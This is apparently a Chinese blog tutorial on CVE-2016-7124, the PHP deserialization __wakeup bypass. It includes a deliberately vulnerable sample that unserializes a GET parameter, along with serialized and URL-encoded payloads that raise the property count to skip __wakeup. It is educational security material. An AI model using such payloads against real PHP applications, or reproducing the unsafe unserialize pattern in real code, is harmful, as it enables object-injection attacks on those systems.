【CVE-2016-7124】 PHP反序列化 wakeup绕过

本文最后更新于:2021年8月28日晚上6点40分

CVE-2016-7124

漏洞原理

当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行。

漏洞影响范围

PHP5 < 5.6.25
PHP7 < 7.0.10

PHP5.5.9的wakeup绕过

假设有以下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
class User{
public $username;
public $password;

function __wakeup(){
die("123");
}
function __destruct(){
die("456");
}
}

$a = $_GET['a'];
$a_unseri = unserialize($a);
var_dump($a_unseri);

?>

构造对象:

1
2
3
4
5
6
7
8
9
10
<?php
class User{
public $username = "Lxxx";
public $password = "lxxx";
}
$a = new User();
echo urlencode(serialize($a));
echo "\n";
echo serialize($a);
?>

得到结果:

1
2
O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}

对浏览器传参:

1
O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D

得到结果为:

image-20210827172025487

但是当我们将对象数修改的大一些(由2修改为3):

1
2
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}

即传参:

1
O%3A4%3A%22User%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D

得到的结果为:

image-20210827172200370

也就绕过了wakeup这个魔术方法